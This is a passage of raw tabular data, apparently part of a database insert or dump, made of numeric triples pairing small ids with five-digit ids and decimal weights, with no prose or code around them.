105,19727,0.98),(105,19728,1.07331),(105,19729,0.37331),(105,19730,1.05),(105,19731,1.14331),(105,19732,0.95669),(105,19733,0.91),(105,19734,0.32669),(105,19735,0.95669),(105,19736,1.07331),(105,19737,0.86331),(105,19738,0.93331),(105,19769,0.93338),(105,19770,1.02669),(105,19771,1.16669),(105,19772,1.00331),(105,19773,1.09669),(105,19774,0.86331),(105,19775,0.95669),(105,19776,0.95669),(105,19777,1.07331),(105,19778,0.32669),(107,19778,0.32669),(105,19779,0.98),(105,19780,1.09669),(105,19781,0.14),(105,19782,0.91),(105,19783,1.00331),(105,19784,0.46669),(105,19785,0.98),(105,19786,1.12),(105,19787,0.32669),(105,19788,0.95669),(105,19789,1.07331),(105,19790,0.88669),(118,19790,0.88669),(105,19791,1.12),(105,19792,0.88669),(105,19793,0.98),(105,19794,1.00331),(105,19795,0.93331),(105,19796,1.00331),(105,19797,0.98),(105,19798,1.09669),(105,19799,0.42),(105,19800,0.95669),(105,19801,1.12),(105,19802,0.88669),(105,19803,1.00331),(105,19804,0.95669),(105,19805,1.00331),(105,19806,0.88669),(107,19806,0.88669),(106,19806,1.77338),(110,19806,1.77338),(117,19806,1.77338),(119,19806,1.77338),(123,19806,1.77338),(105,19807,1.02669),(105,19808,0.34),(105,19905,0.91),(105,19906,1.00331),(105,19907,0.86331),(105,19908,0.91),(105,19909,0.95669),(105,19910,0.91),(105,19911,0.93331),(105,19912,0.91),(105,19913,0.14),(112,19913,0.14),(119,19913,0.14),(125,19913,0.14),(105,19914,0.88669),(105,19915,0.95669),(105,19916,0.09331),(105,19917,1.00331),(105,19918,1.12),(105,19919,0.79331),(106,19919,0.79331),(119,19919,0.79331),(112,19919,1.58662),(126,19919,1.58662),(105,19920,1.02669),(105,19921,0.84),(105,19922,0.93331),(105,19923,1.82),(105,19924,1.02669),(105,19925,1.05),(105,19926,0.81669),(105,19927,1.07331),(105,19928,0.86331),(105,19929,1.07331),(105,19930,1.07331),(105,19931,1.28331),(105,19932,0.86331),(105,19933,1.00331),(105,19934,0.91),(105,19935,1.00331),(105,19936,0.86331),(123,19936,0.86331),(105,19937,0.98),(105,19938,1.07331),(105,19939,1.16669),(105,19940,0.86331),(105,19941,1.00331),(105,19942,1.00331),(105,19943,0.98),(105,19944,0.95669),(105,19945,0.95669),(105,19946,0.86331),(105,19947,1.02669),(105,19948,0.32669),(105,19949,1.00331),(105,19950,1.21331),(105,19951,0.37331),(105,19952,0.95669),(105,19953,1.02669),(105,19954,1.00331),(105,19955,1.16669),(105,19956,0.42),(105,19957,1.00331),(105,19958,1.19),(105,19959,0.95669),(105,19960,1.21331),(105,19961,0.81669),(106,19961,0.81669),(120,19961,0.81669),(105,19962,0.91),(105,19963,0.88669),(105,19964,0.98),(105,19965,0.93331),(105,19966,1.05),(105,19967,0.91),(105,19968,1.05),(105,19969,1.00331),(105,19970,1.05),(105,19971,0.98),(105,19972,0.91),(105,19973,0.98),(105,19974,0.86331),(105,19975,0.93331),(105,19976,0.86331),(105,19977,0.95669),(105,20002,0.37331),(105,20003,1.00331),(105,20004,1.19),(105,20005,0.14),(105,20006,0.84),(105,20007,0.95669),(105,20008,0.23331),(105,20009,0.91),(105,20010,0.95669),(105,20011,0.32669),(105,20012,0.93331),(105,20013,1.12),(105,20014,0.60669),(105,20015,1.21331),(105,20016,1.37669),(112,20017,0.23331),(105,20017,0.46662),(107,20017,0.46662),(110,20017,0.46662),(105,20018,0.88669),(105,20019,1.09669),(105,20020,1.02669),(105,20021,1.14331),(105,20022,0.32669),(105,20023,1.07331),(105,20024,1.19),(105,20254,2.4666),(105,20255,0.18669),(105,20256,0.86331),(105,20257,0.98),(105,20258,0.14),(105,20259,0.95669),(105,20260,1.05),(105,20261,0.60669),(105,20262,1.09669),(105,20263,1.19),(105,20264,1.02669),(105,20265,0.18669),(126,20265,0.18669),(105,20266,0.98),(105,20267,1.07331),(105,20268,0.28),(107,20268,0.28),(112,20268,0.28),(118,20268,0.28),(119,20268,0.28),(120,20268,0.28),(126,20268,0.28),(128,20268,0.28),(110,20268,0.56),(125,20268,0.56),(117,20268,1.12),(105,20269,1.05),(105,20270,1.12),(105,20271,0.32669),(117,20271,0.32669),(118,20271,0.32669),(110,20271,0.65338),(107,20271,0.98007),(105,20272,0.98),(105,20273,1.12),(105,20274,0.28),(105,20275,1.00331),(105,20276,1.33),(105,20277,0.46669),(105,20278,1.00331),(105,20279,1.09669),(105,20280,0.28),(105,20281,0.98),(105,20282,1.07331),(105,20283,0.88669),(105,20284,1.02669),(105,20285,0.18669),(120,20285,0.18669),(105,20286,0.91),(105,20287,0.98),(105,20288,0.18669),(105,20289,0.88669),(105,20290,1.00331),(105,20291,0.91),(105,20292,0.98),(105,20293,0.95669),(105,20294,1.05),(105,20295,0.32669),(105,20296,1.05),(105,20297,1.12),(105,20298,0.28),(105,20299,0.95669),(105,20300,1.00331),(105,20301,0.18669),(105,20302,0.88669),(105,20303,0.95669),(106,20772,0.42),(106,20773,1.07331),(106,20774,1.19),(106,21093,0.37331),(106,21094,1.07331),(106,21095,1.26),(106,21096,0.23331),(106,21097,0.88669),(106,21098,1.00331),(106,21099,0.18669),(106,21100,0.88669),(106,21101,0.98),(106,21102,0.93331),(106,21103,1.05),(106,21104,0.88669),(106,21105,1.12),(106,21106,0.23331),(118,21106,0.23331),(106,21107,0.88669),(106,21108,0.98),(106,21109,0.93331),(106,21110,1.14331),(106,21111,0.98),(106,21112,1.05),(106,21113,1.07331),(106,21114,1.23669),(106,21115,0.42),(106,21116,1.07331),(106,21117,1.37669),(106,21118,0.32669),(128,21118,0.32669),(113,21118,0.65338),(125,21118,1.30676),(116,21118,4.90035),(106,21119,0.95669),(106,21120,1.09669),(106,21121,0.18662),(125,21121,0.18662),(106,21122,1.00331),(106,21123,1.07331),(106,21124,0.88669),(106,21125,0.95669),(106,21164,0.28),(106,21165,0.93331),(106,21166,1.07331),(106,21167,0.98),(106,21168,1.14331),(110,21169,0.28),(106,21169,0.56),(106,21170,2.05338),(106,21171,1.12),(106,21172,1.09669),(106,21173,0.42),(106,21174,1.07331),(106,21175,1.16669),(106,21176,0.37331),(118,21176,0.37331),(106,21177,0.95669),(106,21178,1.07331),(106,21179,0.42),(106,21180,1.00331),(106,21181,1.16669),(106,21182,0.91),(106,21183,1.02669),(119,21184,0.37331),(106,21184,1.11993),(106,21185,1.02669),(106,21186,1.16669),(106,21187,1.21331),(106,21188,1.33),(106,21189,1.02669),(106,21190,1.21331),(106,21191,0.46662),(106,21192,0.91),(106,21193,1.02669),(106,21194,0.93331),(106,21195,1.05),(106,21196,0.28),(116,21196,0.28),(120,21196,0.28),(106,21197,0.95669),(106,21198,1.02669),(106,21199,0.18669),(125,21199,0.18669),(106,21200,0.93331),(106,21201,1.05),(106,21202,0.28),(106,21203,0.93331),(106,21204,0.98),(106,21205,0.93331),(106,21206,1.12),(106,21207,0.98),(106,21208,1.19),(106,21209,0.28),(106,21210,1.00331),(106,21211,1.21331),(106,21212,1.40007),(106,21213,1.02669),(106,21214,1.16669),(106,21215,1.19),(106,21216,1.28331),(106,21217,1.14331),(106,21218,1.28331),(106,21219,0.84),(106,21220,0.93331),(106,21221,1.07331),(106,21222,1.05),(106,21223,1.19),(106,21224,1.02669),(106,21225,1.16669),(116,21226,0.28),(106,21226,0.84),(106,21227,2.00662),(106,21228,2.19338),(106,21229,0.93331),(106,21230,1.02669),(106,21231,1.05),(106,21232,0.86331),(118,21232,0.86331),(128,21232,6.90648),(113,21232,16.4029),(106,21233,0.93331),(113,21233,0.93331),(106,21234,1.09669),(106,21235,0.88669),(113,21235,0.88669),(128,21235,0.88669),(106,21236,1.07331),(106,21237,0.91),(128,21237,1.82),(113,21237,3.64),(106,21238,1.00331),(106,21239,0.28),(106,21240,1.02669),(106,21241,1.09669),(106,21242,0.32669),(120,21242,1.63345),(106,21243,0.95669),(106,21244,1.09669),(106,21245,0.28),(106,21246,0.91),(106,21247,1.09669),(106,21248,0.32669),(112,21248,0.32669),(106,21249,1.02669),(106,21250,1.12),(106,21251,0.32669),(106,21252,1.02669),(106,21253,1.19),(125,21254,0.23331),(113,21254,0.46662),(106,21254,0.69993),(106,21255,1.82),(106,21256,1.12),(106,21257,1.12),(106,21258,0.95669),(106,21259,1.05),(106,21260,1.00331),(106,21261,1.23669),(106,21262,0.93331),(106,21263,1.02669),(106,21343,0.28),(116,21343,0.28),(106,21344,1.02669),(106,21345,1.14331),(106,21346,0.93331),(106,21347,1.00331),(106,21348,0.93331),(106,21349,1.00331),(106,21350,0.95669),(106,21351,0.95669),(113,21351,0.95669),(110,21351,1.91338),(106,21352,1.19),(106,21353,0.88669),(107,21353,0.88669),(120,21353,0.88669),(125,21353,0.88669),(106,21354,1.09669),(106,21355,0.91),(106,21356,0.98),(106,21357,0.98),(116,21357,0.98),(118,21357,0.98),(106,21358,0.86331),(106,21359,0.95669),(106,21360,0.42),(117,21360,0.42),(110,21360,1.26),(106,21361,1.09669),(106,21362,1.26),(106,21363,0.46669),(106,21364,1.16669),(106,21365,1.26),(106,21366,0.37331),(109,21366,0.37331),(106,21367,0.95669),(106,21368,1.09669),(106,21369,0.91),(106,21370,1.09669),(106,21371,0.56),(106,21372,1.09669),(106,21373,1.21331),(106,21374,0.91),(106,21375,0.91),(106,21376,0.98),(106,21377,1.02669),(106,21378,0.93331),(106,21379,1.02669),(106,21380,0.86331),(106,21381,0.95669),(106,21382,0.98),(106,21383,0.86331),(106,21384,1.05),(106,21385,0.95669),(106,21386,1.09669),(106,21387,0.86331),(106,21388,1.00331),(106,21389,0.88669),(110,21389,0.88669),(106,21390,0.86331),(113,21390,0.86331),(128,21390,0.86331),(106,21391,1.07331),(106,21392,1.09669),(106,21393,1.16669),(106,21394,0.93331),(106,21395,1.02669),(106,21396,0.95669),(112,21396,0.95669),(106,21397,0.86331),(106,21398,0.93331),(106,21399,0.88669),(106,21400,0.95669),(106,21401,0.98),(106,21402,0.95669),(106,21403,1.05),(106,21404,0.98),(106,21405,1.14331),(106,21406,0.91),(106,21407,0.81669),(110,21407,0.81669),(123,21407,0.81669),(117,21407,2.45007),(106,21408,0.91),(110,21408,0.91),(123,21408,0.91),(106,21409,0.91),(106,21410,0.95669),(106,21411,1.02669),(106,21412,1.19),(106,21413,0.93331),(106,21414,1.02669),(106,21655,0.32669),(106,21656,2.4666),(106,21657,0.28),(118,21657,0.28),(106,21658,1.05),(106,21659,1.12),(106,21660,0.32669),(106,21661,0.95669),(106,21662,1.16669),(106,21663,0.84),(106,21664,1.00331),(106,21665,1.16669),(106,21666,1.09669),(106,21667,1.19),(106,21668,0.37338),(106,21669,2.00662),(106,21670,1.14331),(106,21671,1.07331),(106,21672,0.23331),(126,21672,0.23331),(106,21673,1.14331),(106,21674,1.35331),(106,21675,0.23331),(106,21676,1.05),(106,21677,1.26),(106,21678,0.37338),(106,21679,0.95669),(106,21680,1.09669),(106,21681,0.95669),(106,21682,1.12),(106,21683,0.46669),(106,21684,1.14331),(106,21685,1.30669),(106,21686,0.88669),(106,21687,1.00331),(106,21688,0.32669),(106,21689,0.98),(106,21690,1.07331),(106,21691,6.5338),(106,21692,0.95669),(106,21693,1.05),(106,21694,1.02669),(106,21695,1.09669),(106,21696,0.98),(106,21697,1.07331),(106,21698,2.87007),(106,21699,1.19),(106,21700,1.14331),(106,21701,1.07331),(106,21702,0.98),(106,21703,1.12),(106,21704,0.93331),(106,21705,1.02669),(106,21706,2.79993),(106,21707,1.96),(106,21708,1.05),(106,21709,1.07331),(106,21710,1.14331),(106,21711,1.05),(106,21712,1.14331),(106,21713,1.05),(106,21714,1.12),(106,21715,2.94),(106,21716,1.07331),(106,21717,1.05),(106,21718,1.09669),(106,21719,0.98),(106,21720,1.16669),(106,21721,1.91338),(106,21722,1.07331),(106,21723,1.07331),(106,21724,0.37331),(106,21725,1.07331),(106,21726,1.23669),(106,21727,0.37331),(106,21728,1.02669),(106,21729,1.09669),(106,21730,0.56),(106,21731,1.86662),(106,21732,2.19338),(106,21733,0.86331),(106,21734,0.93331),(106,21735,0.28),(106,21736,0.93331),(106,21737,1.05),(106,21738,0.37331),(106,21739,1.02669),(106,21740,1.28331),(106,21741,1.00331),(106,21742,1.05),(106,21743,1.05),(106,21744,1.23669),(106,21745,1.07331),(106,21746,1.21331),(106,21747,0.18669),(106,21748,0.93331),(106,21749,1.02669),(106,21750,0.51331),(110,21750,0.51331),(106,21751,1.05),(106,21752,1.21331),(106,21753,0.42),(112,21753,0.42),(119,21753,0.42),(106,21754,1.00331),(106,21755,1.19),(106,21756,0.32669),(123,21756,0.65338),(106,21757,0.93331),(106,21758,1.12),(106,21759,0.46669),(106,21760,1.05),(106,21761,1.16669),(107,22384,0.84),(107,22385,0.93331),(117,22386,0.09331),(125,22386,0.18662),(107,22386,0.37324),(107,22387,3.36),(107,22388,2.00662),(107,22389,2.05338),(107,22390,0.56),(107,22391,2.00662),(107,22392,1.14331),(107,22393,0.56),(107,22394,1.91338),(107,22395,1.12),(107,22396,1.07331),(107,22397,0.28),(107,22398,0.91),(107,22399,1.00331),(107,22400,2.19338),(107,22401,2.33338),(111,22402,0.37331),(120,22402,0.74662),(107,22402,2.23986),(107,22403,2.14662),(107,22404,2.33338),(107,22405,4.10676),(107,22406,4.85324),(107,22407,0.65338),(107,22408,2.05338),(107,22409,2.19338),(125,22448,0.18669),(107,22448,0.74676),(107,22449,1.86662),(107,22450,2.05338),(107,22451,1.82),(107,22452,2.00662),(107,22453,0.93331),(107,22454,1.09669),(107,22455,0.18662),(107,22456,1.72662),(107,22457,2.00662),(107,22458,0.46662),(126,22458,0.69993),(107,22459,1.77338),(107,22460,2.00662),(117,22461,0.18669),(107,22461,4.85394),(107,22462,1.77338),(107,22463,1.91338),(107,22464,3.45324),(107,22465,4.29324),(107,22466,1.82),(107,22467,1.23669),(107,22468,1.07331),(107,22469,1.96),(107,22470,1.12),(107,22471,1.12),(107,22472,1.96),(107,22473,2.1),(107,22474,1.77338),(107,22475,2.00662),(107,22476,1.77338),(107,22477,2.19338),(107,22478,3.45324),(107,22479,1.86662),(107,22480,2.00662),(107,22481,1.72662),(107,22482,2.00662),(117,22483,1.05),(107,22483,2.1),(117,22484,1.23669),(107,22484,2.47338),(107,22485,1.86662),(107,22486,2.05338),(107,22487,1.07331),(107,22488,0.93331),(107,22489,1.12),(107,22490,0.46669),(107,22491,1.12),(107,22492,1.23669),(126,22493,0.88669),(107,22493,1.77338),(107,22494,1.86662),(107,22495,0.86331),(110,22495,0.86331),(117,22495,0.86331),(107,22496,0.93331),(123,22497,0.28),(107,22497,0.56),(107,22498,2.05338),(107,22499,2.24),(107,22500,0.65338),(107,22501,1.86662),(107,22502,1.19),(107,22503,1.12),(107,22504,0.37331),(107,22505,1.00331),(107,22506,1.09669),(107,22507,0.65338),(107,22508,1.91338),(107,22509,1.21331),(107,22510,1.07331),(107,22511,2.05338),(107,22512,2.24),(117,22513,0.91),(107,22513,1.82),(107,22514,2.19338),(107,22515,1.00331),(107,22516,0.84),(107,22517,2.05338),(107,22518,2.42662),(107,22559,2.24028),(107,22560,3.45324),(107,22561,1.96),(107,22562,2.1),(107,22563,1.82),(107,22564,1.96),(107,22565,1.96),(107,22566,2.14662),(107,22567,1.96),(107,22568,2.1),(107,22569,1.77338),(107,22570,1.05),(107,22571,1.02669),(107,22572,2.45007),(107,22573,1.05),(107,22574,2.00662),(107,22575,1.96),(107,22576,1.21331),(107,22577,1.09669),(107,22578,1.00331),(107,22579,1.07331),(107,22580,1.82),(107,22581,2.05338),(107,22582,0.98),(107,22583,0.95669),(107,22584,1.02669),(107,22585,1.72662),(107,22586,2.24),(107,22587,1.86662),(107,22588,2.05338),(107,22589,0.93331),(107,22590,1.00331),(107,22591,1.72662),(107,22592,1.91338),(107,22593,1.82),(107,22594,1.00331),(107,22595,1.07331),(107,22596,1.91338),(107,22597,2.1),(107,22598,1.77338),(107,22599,2.24),(113,22600,0.32669),(117,22600,0.32669),(118,22600,0.32669),(120,22600,0.32669),(107,22600,0.65338),(110,22600,0.65338),(123,22600,0.65338),(107,22601,2.14662),(107,22602,2.66),(107,22603,0.93338),(107,22604,2.00662),(107,22605,2.24),(107,22606,1.77338),(107,22607,2.05338),(107,22608,1.86662),(107,22609,0.81669),(110,22609,0.81669),(123,22609,1.63338),(107,22610,0.91),(107,22611,0.93331),(107,22612,1.09669),(107,22613,0.91),(107,22614,1.09669),(107,22615,1.96),(107,22616,4.90014),(107,22617,0.88669),(107,22618,0.95669),(107,22619,1.02669),(107,22620,1.86662),(107,22621,1.00331),(107,22622,1.07331),(107,22623,0.98),(107,22624,1.05),(107,22630,0.95669),(107,22631,1.05),(107,22632,0.88669),(107,22633,0.98),(107,22634,1.02669),(107,22635,1.07331),(107,22636,0.95669),(107,22637,1.19),(107,22745,2.4666),(107,22746,1.26),(107,22747,1.02669),(118,22747,1.02669),(119,22747,1.02669),(126,22747,1.02669),(107,22748,1.19),(118,22748,1.19),(119,22748,1.19),(126,22748,1.19),(107,22749,0.98),(107,22750,1.07331),(107,22751,1.05),(107,22752,1.23669),(107,22753,0.93338),(107,22754,2.00662),(107,22755,2.33338),(107,22756,0.65338),(107,22757,2.00662),(107,22758,2.14662),(107,22759,0.95669),(107,22760,1.12),(107,22761,1.96),(107,22762,2.1),(107,22763,0.95669),(107,22764,1.05),(125,22765,0.88669),(107,22765,3.54676),(107,22766,2.1),(107,22767,2.14662),(107,22768,1.12),(107,22769,2.19338),(107,22770,2.33338),(107,22771,1.82),(107,22772,2.19338),(110,22773,0.23331),(107,22773,0.46662),(107,22774,1.77338),(107,22775,1.91338),(107,22776,0.93338),(107,22777,2.00662),(107,22778,2.42662),(107,22779,0.46669),(107,22780,1.05),(107,22781,1.14331),(118,22782,0.28),(107,22782,0.56),(107,22783,1.86662),(107,22784,2.42662),(117,22785,0.46669),(126,22785,0.46669),(107,22785,0.93338),(117,22786,1.12),(107,22786,2.24),(107,22787,2.52),(107,22788,0.46669),(107,22789,1.00331),(107,22790,1.09669),(107,22791,0.74662),(107,22792,1.86662),(107,22793,2.14662),(112,22794,0.32669),(107,22794,0.65338),(107,22795,1.91338),(107,22796,2.05338),(116,23326,0.65338),(120,23333,0.84),(119,23335,0.84),(126,23335,0.84),(113,23342,0.18669),(112,23347,0.23331),(116,23347,0.46662),(117,23347,0.46662),(125,23347,0.46662),(128,23347,0.46662),(113,23347,1.16655),(116,23358,0.88669),(112,23436,0.37338),(113,23457,0.18669),(112,23576,0.79331),(125,23576,1.58662),(117,23656,0.23331),(123,23656,0.23331),(128,23656,0.23331),(112,23668,0.18669),(110,23668,0.37338),(112,23669,0.86331),(110,23865,0.32669),(110,23878,0.56),(110,23888,0.32669),(120,23888,0.32669),(110,23894,0.46669),(110,23903,0.74662),(109,24371,0.86331),(109,24372,1.00331),(109,24554,0.18662),(121,24554,0.18662),(114,24554,0.27993),(111,24554,0.74648),(109,24555,0.81669),(109,24556,0.93331),(109,24557,0.84),(111,24557,0.84),(109,24558,0.91),(109,24559,0.14),(111,24559,0.28),(109,24560,0.84),(109,24561,1.00331),(109,24562,0.51331),(109,24563,1.09669),(109,24564,1.26),(109,24565,0.42),(111,24565,0.56),(109,24566,0.91),(109,24567,0.98),(109,24568,1.02669),(109,24569,1.09669),(109,24570,0.84),(109,24571,0.95669),(109,24572,0.28),(111,24572,2.24),(109,24573,1.00331),(109,24574,1.16669),(109,24575,0.46662),(111,24575,0.46662),(109,24576,1.16669),(109,24577,1.26),(109,24578,1.07331),(109,24579,1.19),(109,24580,0.23331),(111,24580,0.23331),(114,24580,0.23331),(109,24581,1.16669),(109,24582,1.30669),(121,24583,0.46655),(109,24583,0.9331),(114,24583,0.9331),(111,24583,3.63909),(109,24584,0.88669),(109,24585,1.00331),(109,24586,0.98),(109,24587,1.16669),(109,24588,0.88669),(109,24589,0.93331),(109,24590,0.86331),(109,24591,0.91),(109,24592,0.86331),(109,24593,0.91),(109,24594,2.58993),(109,24595,0.91),(109,24596,0.95669),(109,24597,0.95669),(109,24598,0.86331),(109,24599,0.95669),(109,24600,0.91),(111,24600,0.91),(109,24601,1.09669),(111,24601,1.09669),(109,24602,0.51331),(109,24603,1.05),(109,24604,1.12),(109,24605,0.37331),(109,24606,0.95669),(109,24607,1.12),(109,24608,0.60669),(109,24609,1.09669),(109,24610,1.23669),(109,24611,0.28),(109,24612,0.91),(109,24613,1.14331),(109,24614,1.05),(109,24615,1.4),(109,24649,0.23331),(109,24650,1.00331),(109,24651,1.12),(109,24652,0.93338),(109,24653,1.02669),(109,24654,1.21331),(109,24655,1.14331),(109,24656,1.37669),(109,24657,0.37331),(109,24658,1.00331),(109,24659,1.12),(109,24660,0.18669),(109,24661,0.86331),(109,24662,1.14331),(109,24663,0.28),(109,24664,0.98),(109,24665,1.33),(109,24693,0.95669),(109,24694,1.12),(109,24695,0.93331),(109,24696,1.00331),(109,24697,0.18669),(109,24698,0.84),(125,24699,0.09331),(109,24699,0.18662),(121,24699,0.37324),(114,24699,0.46655),(111,24699,1.8662),(109,24700,0.98),(109,24701,1.07331),(109,24702,0.84),(109,24703,1.09669),(109,24704,0.84),(109,24705,1.12),(109,24706,0.95669),(109,24707,1.02669),(109,24708,0.98),(109,24709,1.14331),(109,24710,0.7),(109,24711,1.4),(109,24712,1.4),(109,24713,0.98),(109,24714,1.05),(109,24715,0.56),(109,24716,1.05),(109,24717,1.19),(109,24718,0.28),(111,24718,0.28),(113,24718,0.56),(121,24718,0.56),(128,24718,0.56),(114,24718,0.84),(109,24719,0.93331),(109,24720,1.23669),(111,24859,0.32669),(109,24859,0.65338),(109,24860,1.91338),(109,24861,2.1),(109,24862,0.51331),(109,24863,1.05),(109,24864,1.19),(109,24865,0.18669),(109,24866,0.86331),(109,24867,1.09669),(109,24868,0.14),(111,24868,1.54),(109,24869,1.07331),(109,24870,1.14331),(109,24871,0.95669),(113,24871,0.95669),(114,24871,0.95669),(121,24871,0.95669),(128,24871,0.95669),(109,24872,1.05),(109,24873,0.37331),(109,24874,0.95669),(109,24875,1.07331),(109,24876,0.46669),(109,24877,1.00331),(109,24878,1.09669),(109,24879,0.51331),(109,24880,1.00331),(109,24881,1.14331),(109,24882,0.14),(109,24883,0.95669),(109,24884,1.09669),(109,24885,0.37331),(109,24886,0.93331),(109,24887,1.12),(109,24888,0.28),(109,24889,0.88669),(109,24890,1.09669),(109,24891,0.42),(109,24892,1.07331),(109,24893,1.21331),(109,24894,0.81669),(109,24895,1.07331),(110,25145,0.42),(110,25146,0.86331),(110,25147,0.95669),(110,25148,0.91),(110,25149,1.00331),(110,26187,0.88669),(110,26188,0.95669),(110,26189,0.14),(110,26190,0.88669),(110,26191,1.05),(110,26192,0.56),(110,26193,1.14331),(110,26194,1.30669),(110,26195,0.91),(110,26196,1.12),(110,26197,0.32669),(110,26198,0.93331),(110,26199,1.12),(110,26200,1.00331),(110,26201,1.07331),(112,26202,0.18669),(126,26202,0.18669),(110,26202,0.74676),(110,26203,1.02669),(110,26204,1.09669),(110,26205,0.86331),(110,26206,0.95669),(110,26207,0.98),(110,26208,1.09669),(110,26209,0.88669),(110,26210,1.05),(110,26211,0.23331),(110,26212,1.05),(110,26213,1.21331),(110,26214,0.84),(110,26215,0.93331),(110,26216,0.93331),(110,26217,1.12),(110,26218,0.91),(110,26219,1.00331),(110,26220,0.88669),(110,26221,1.05),(110,26222,0.23331),(110,26223,0.95669),(110,26224,1.05),(110,26225,0.28),(110,26226,1.07331),(110,26227,1.23669),(110,26228,0.42),(110,26229,0.98),(110,26230,1.19),(110,26231,0.93331),(110,26232,1.05),(110,26233,0.32669),(110,26234,0.95669),(110,26235,1.09669),(110,26236,0.23331),(110,26237,0.91),(110,26238,1.00331),(110,26239,0.46669),(110,26240,1.00331),(110,26241,1.21331),(110,26242,0.28),(110,26243,0.91),(110,26244,1.19),(110,26245,0.95669),(110,26246,1.28331),(110,26247,0.28),(110,26248,0.91),(110,26249,1.00331),(110,26250,0.60669),(110,26251,1.07331),(110,26252,1.23669),(110,26253,0.93338),(110,26254,2.00662),(110,26255,1.16669),(110,26256,1.16669),(110,26257,0.51331),(128,26257,0.51331),(110,26258,1.16669),(110,26259,1.23669),(110,26260,0.95669),(110,26261,1.05),(110,26262,1.19),(110,26263,1.4),(110,26264,1.14331),(110,26265,1.19),(110,26266,0.93331),(110,26267,1.09669),(110,26268,0.32669),(118,26268,0.32669),(110,26269,1.07331),(110,26270,1.35331),(110,26271,0.37331),(110,26272,1.19),(110,26273,1.28331),(110,26274,0.23331),(110,26275,0.95669),(110,26276,1.07331),(110,26277,0.84),(110,26278,1.07331),(110,26279,1.14331),(110,26280,1.05),(110,26281,1.14331),(110,26282,0.93338),(110,26283,1.02669),(110,26284,1.19),(110,26285,1.00331),(110,26286,1.09669),(110,26287,0.42),(110,26288,0.98),(110,26289,1.21331),(110,26290,0.46669),(110,26291,1.00331),(110,26292,1.28331),(110,26293,0.51331),(110,26294,1.07331),(110,26295,1.14331),(110,26296,0.32669),(110,26297,1.07331),(110,26298,1.14331),(110,26299,1.12),(110,26300,1.09669),(110,26301,1.19),(110,26302,1.09669),(110,26303,1.23669),(110,26304,0.46669),(110,26305,1.12),(110,26306,1.19),(110,26307,0.51331),(110,26308,1.05),(110,26309,1.12),(110,26310,0.37331),(110,26311,0.98),(110,26312,1.05),(110,26313,1.00331),(110,26314,1.21331),(110,26315,0.84),(118,26315,0.84),(110,26316,1.00331),(110,26317,0.86331),(117,26317,0.86331),(110,26318,0.93331),(112,26319,0.18669),(117,26319,0.18669),(110,26319,0.37338),(110,26320,1.77338),(110,26321,1.05),(110,26322,1.00331),(110,26323,0.98),(110,26324,1.14331),(110,26325,0.51331),(110,26326,1.19),(110,26327,1.26),(110,26328,0.32669),(110,26329,0.93331),(110,26330,1.12),(110,26331,1.49324),(110,26332,0.98),(110,26333,1.05),(110,26334,0.93331),(110,26335,1.09669),(110,26336,0.95669),(110,26337,1.19),(110,26338,0.95669),(110,26339,1.14331),(110,26340,0.95669),(110,26341,1.02669),(110,26342,1.00331),(110,26343,0.37331),(110,26344,0.95669),(110,26345,1.09669),(110,26346,0.18669),(128,26346,0.18669),(110,26347,0.86331),(110,26348,0.95669),(110,26595,0.95669),(110,26596,1.12),(110,26597,0.23331),(120,26597,0.23331),(110,26598,1.02669),(110,26599,1.09669),(110,26600,0.23331),(110,26601,0.88669),(110,26602,1.07331),(110,26603,0.37331),(110,26604,0.95669),(110,26605,1.16669),(110,26606,0.37331),(110,26607,0.98),(110,26608,1.14331),(110,26609,0.37331),(117,26609,1.11993),(110,26610,1.09669),(110,26611,1.23669),(110,26612,0.93331),(110,26613,1.09669),(110,26614,1.02669),(110,26615,1.16669),(110,26616,0.91),(110,26617,1.02669),(110,26618,1.00331),(110,26619,1.16669),(123,26620,0.32669),(110,26620,0.98007),(110,26621,0.98),(110,26622,1.09669),(110,26623,0.95669),(110,26624,1.05),(110,26625,1.00331),(110,26626,1.16669),(110,26627,0.37331),(110,26628,1.09669),(110,26629,1.16669),(110,26630,0.18669),(110,26631,0.95669),(110,26632,1.02669),(110,26633,0.46662),(110,26634,0.91),(110,26635,1.09669),(110,26636,0.88669),(110,26637,0.98),(110,26638,0.46662),(110,26639,0.88669),(110,26640,0.98),(110,26641,0.88669),(110,26642,0.95669),(110,26643,1.07331),(110,26644,1.23669),(110,26645,0.84),(110,26646,0.95669),(110,26647,0.28),(110,26648,0.93331),(110,26649,1.09669),(110,26650,1.00331),(110,26651,1.09669),(110,26652,1.12),(110,26653,1.19),(110,26654,1.02669),(110,26655,1.02669),(110,26656,1.07331),(110,26657,1.09669),(110,26658,1.07331),(110,26659,0.84),(110,26660,0.93331),(110,26661,0.98),(110,26662,1.02669),(110,26663,0.91),(114,26663,0.91),(111,26663,2.73),(110,26664,1.12),(110,26665,1.07331),(110,26666,1.23669),(110,26667,0.84),(110,26668,0.93331),(110,26669,0.98),(110,26670,1.14331),(110,26671,0.84),(110,26672,1.05),(112,26673,0.95669),(110,26673,1.91338),(112,26674,1.14331),(110,26674,2.28662),(110,26675,2.87007),(110,26676,1.02669),(110,26677,1.02669),(110,26678,1.02669),(110,26679,1.07331),(110,26680,1.14331),(110,26681,1.02669),(110,26682,0.95669),(110,26683,0.42),(110,26684,0.98),(110,26685,1.16669),(110,26686,0.42),(110,26687,1.00331),(110,26688,1.14331),(110,26689,1.05),(110,26690,1.12),(110,26691,0.98),(110,26692,0.69993),(110,26693,1.77338),(110,26694,2.05338),(110,26695,0.93331),(110,26696,1.12),(110,26697,0.46662),(110,26698,1.09669),(110,26699,1.26),(110,26700,0.91),(110,26701,1.16669),(110,26702,0.23331),(117,26702,0.23331),(123,26702,0.23331),(126,26702,0.23331),(110,26703,0.88669),(123,26703,0.88669),(110,26704,0.95669),(110,26705,0.74662),(110,26706,1.91338),(110,26707,2.14662),(110,26708,0.23331),(110,26709,0.88669),(110,26710,1.12),(110,26711,1.86662),(110,26712,1.19),(110,26713,1.02669),(110,26714,0.88669),(110,26715,1.00331),(110,26716,1.07331),(110,26717,0.91),(110,26718,1.07331),(110,26719,1.00331),(110,26720,1.16669),(110,26721,1.02669),(110,26722,1.14331),(110,26723,0.32669),(110,26724,0.95669),(110,26725,1.19),(110,26726,0.46669),(110,26727,1.07331),(110,26728,1.35331),(110,26729,1.82),(110,26730,0.98),(110,26731,1.05),(110,26732,0.98),(110,26733,1.09669),(110,26734,0.98007),(110,26735,1.02669),(110,26736,1.09669),(110,26737,1.00331),(110,26738,1.09669),(110,26739,1.00331),(110,26740,1.09669),(110,26880,1.58662),(110,26881,0.93331),(110,26882,1.00331),(110,26883,0.98),(110,26884,1.02669),(110,26885,0.93331),(110,26886,1.